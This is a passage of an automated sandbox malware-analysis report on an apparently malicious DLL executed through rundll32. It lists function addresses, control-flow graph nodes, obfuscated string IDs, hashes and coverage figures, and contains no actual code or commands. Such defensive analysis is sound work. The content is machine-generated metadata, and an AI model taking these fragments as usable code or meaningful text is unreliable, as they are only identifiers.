                                                                                                                                • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Non-executed Functions

                                                                                                                                Function 0000000180022010 Relevance: 9.0, Strings: 7, Instructions: 235COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 358 180022010-18002203b 359 18002203d-180022043 358->359 360 180022338-1800223a1 call 18001455c 359->360 361 180022049-18002204f 359->361 368 1800223a6-1800223ac 360->368 362 180022055-18002205b 361->362 363 18002232e-180022333 361->363 366 180022061-180022067 362->366 367 1800222be-180022329 call 180019cb4 362->367 363->359 370 180022069-18002206f 366->370 371 18002209a-1800222b9 call 18001dbe8 call 180012320 call 1800194a4 366->371 367->359 368->359 372 1800223b2-1800223c2 368->372 370->368 375 180022075-180022083 370->375 371->368 376 180022089-18002208d 375->376 378 180022085-180022086 376->378 379 18002208f-180022098 376->379 378->376 379->359
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                                                                                • API String ID: 0-2447245168
                                                                                                                                • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                                                                                • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800059B8 Relevance: 7.9, Strings: 6, Instructions: 408COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 568 1800059b8-180005a02 569 180005a04-180005a09 568->569 570 180006107-1800061a6 call 180001b1c 569->570 571 180005a0f-180005a14 569->571 583 1800061ab-1800061b0 570->583 572 180005a1a-180005a1f 571->572 573 180005fcd-180006102 call 180016314 571->573 576 180005a25-180005a2a 572->576 577 180005da6-180005fb1 call 1800093f0 572->577 573->569 581 1800061bb-18000625a call 180001b1c 576->581 582 180005a30-180005a35 576->582 590 180005fc3-180005fc8 577->590 591 180005fb3-180005fbe 577->591 588 18000625f-180006271 581->588 585 180005a3b-180005a40 582->585 586 180005d7e-180005d8c 582->586 587 1800061b6 583->587 583->588 592 180005a46-180005a4b 585->592 593 180005b78-180005d79 call 180009f5c call 18000a62c call 1800194a4 585->593 594 180005d92-180005d96 586->594 587->569 590->569 591->569 598 180005a51-180005a56 592->598 599 180005ad8-180005b68 call 18000abac 592->599 593->569 595 180005d98-180005da1 594->595 596 180005d8e-180005d8f 594->596 595->569 596->594 598->583 602 180005a5c-180005ad3 call 180007958 598->602 599->588 607 180005b6e-180005b73 599->607 602->569 607->569
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                                                                                • API String ID: 0-2100131636
                                                                                                                                • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                                                                                • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180013780 Relevance: 7.8, Strings: 6, Instructions: 323COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 611 180013780-1800137f4 call 1800142a0 614 1800137fb-180013800 611->614 615 180013806-18001380b 614->615 616 180013c55-180013ce4 call 18002620c 614->616 617 180013811-180013816 615->617 618 180013c4b-180013c50 615->618 625 180013ce6-180013ceb 616->625 626 180013cf0 616->626 620 18001381c-180013821 617->620 621 1800138cd-180013c46 call 180006664 call 18000bb28 call 18002a6c8 call 1800194a4 617->621 618->614 623 180013cf5-180013cfa 620->623 624 180013827-1800138a9 call 18000290c 620->624 621->614 629 1800138ae-1800138cc 623->629 630 180013d00 623->630 624->629 625->614 626->623 630->614
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                                                                                • API String ID: 0-2401169580
                                                                                                                                • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                                                                                • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000FC48 Relevance: 6.7, Strings: 5, Instructions: 447COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: )#?$EX.$PT$UbA$2f
                                                                                                                                • API String ID: 0-1318892062
                                                                                                                                • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                                                                                • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001FC0C Relevance: 6.6, Strings: 5, Instructions: 400COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 676 18001fc0c-18001fc44 call 1800142a0 679 18001fc46-18001fc4b 676->679 680 18001fc51 679->680 681 18001ff13-18001ff18 679->681 682 18001fe94-18001ff0e call 180012598 680->682 683 18001fc57-18001fc5c 680->683 684 180020169-1800201f9 call 1800190d4 681->684 685 18001ff1e-18001ff23 681->685 682->679 687 18001fc62-18001fc67 683->687 688 18001fde5-18001fe8f call 180012598 683->688 702 1800201fe-180020203 684->702 689 1800200b6-180020164 call 180012598 685->689 690 18001ff29-18001ff2e 685->690 695 18002020a-18002026b call 1800190d4 687->695 696 18001fc6d-18001fc72 687->696 688->679 689->679 698 1800200a1-1800200b1 call 1800014f8 690->698 699 18001ff34-18001ff39 690->699 711 180020270-180020291 695->711 706 18001fc78-18001fc7d 696->706 707 18001fd57-18001fde0 call 180012598 696->707 698->679 700 180020003-180020091 call 180021434 699->700 701 18001ff3f-18001ff44 699->701 700->711 723 180020097-18002009c 700->723 701->702 709 18001ff4a-18001fffe call 180012598 701->709 710 180020205 702->710 702->711 715 18001fc83-18001fc88 706->715 716 18001fd1f-18001fd52 706->716 707->679 709->679 710->679 715->702 720 18001fc8e-18001fd1a call 18001e938 715->720 716->679 720->679 723->679
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $T$?F$QP|m$qjf$tZp
                                                                                                                                • API String ID: 0-3477398917
                                                                                                                                • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                                                                                • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180016D3C Relevance: 6.6, Strings: 5, Instructions: 379COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: JQ$k&($t$v$x\J
                                                                                                                                • API String ID: 0-1134872184
                                                                                                                                • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                                                                                • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000703C Relevance: 6.3, Strings: 5, Instructions: 87COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: R$)H8$?rIc$L==$V
                                                                                                                                • API String ID: 0-2512384441
                                                                                                                                • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                                                                                • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800119A8 Relevance: 6.3, Strings: 5, Instructions: 63COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Qq$bt$vird$+$S
                                                                                                                                • API String ID: 0-3373980505
                                                                                                                                • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                                                                                • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180011AD0 Relevance: 5.3, Strings: 4, Instructions: 335COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: V$@$P9$^_"
                                                                                                                                • API String ID: 0-1880944046
                                                                                                                                • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                                                                                • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800132F0 Relevance: 5.3, Strings: 4, Instructions: 312COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: =_$F)k$b/$syG
                                                                                                                                • API String ID: 0-3955183656
                                                                                                                                • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                                • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180002D70 Relevance: 5.3, Strings: 4, Instructions: 266COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #X$'Xsa$iJ6$vG
                                                                                                                                • API String ID: 0-746338152
                                                                                                                                • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                                                                                • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800097C0 Relevance: 5.3, Strings: 4, Instructions: 257COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: *i^$MIC$-Z$]2
                                                                                                                                • API String ID: 0-498664264
                                                                                                                                • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                                                                                • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180010758 Relevance: 5.2, Strings: 4, Instructions: 222COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: B$EG$QsF$_
                                                                                                                                • API String ID: 0-784369960
                                                                                                                                • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                                                                                • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180020334 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: -`G$.$5B.Y$Z`35
                                                                                                                                • API String ID: 0-1363032466
                                                                                                                                • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                                                                                • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000EE98 Relevance: 5.2, Strings: 4, Instructions: 167COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: *+_$WSh$\O$#o
                                                                                                                                • API String ID: 0-1846314129
                                                                                                                                • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                                                                                • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180024D80 Relevance: 5.2, Strings: 4, Instructions: 155COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .B$O$M*K$\<
                                                                                                                                • API String ID: 0-3225238681
                                                                                                                                • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                                                                                • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018002A42C Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$$$xVO$~O
                                                                                                                                • API String ID: 0-3655128719
                                                                                                                                • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                                                                                • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800024B8 Relevance: 5.1, Strings: 4, Instructions: 79COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ,IW$G$JMg$l
                                                                                                                                • API String ID: 0-1370644289
                                                                                                                                • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                                                                                • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180018AB4 Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ,$,$2S=$i`}G
                                                                                                                                • API String ID: 0-4285990414
                                                                                                                                • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                                • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                                                                                • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                                • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:18.9%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:4.8%
                                                                                                                                Total number of Nodes:83
                                                                                                                                Total number of Limit Nodes:8
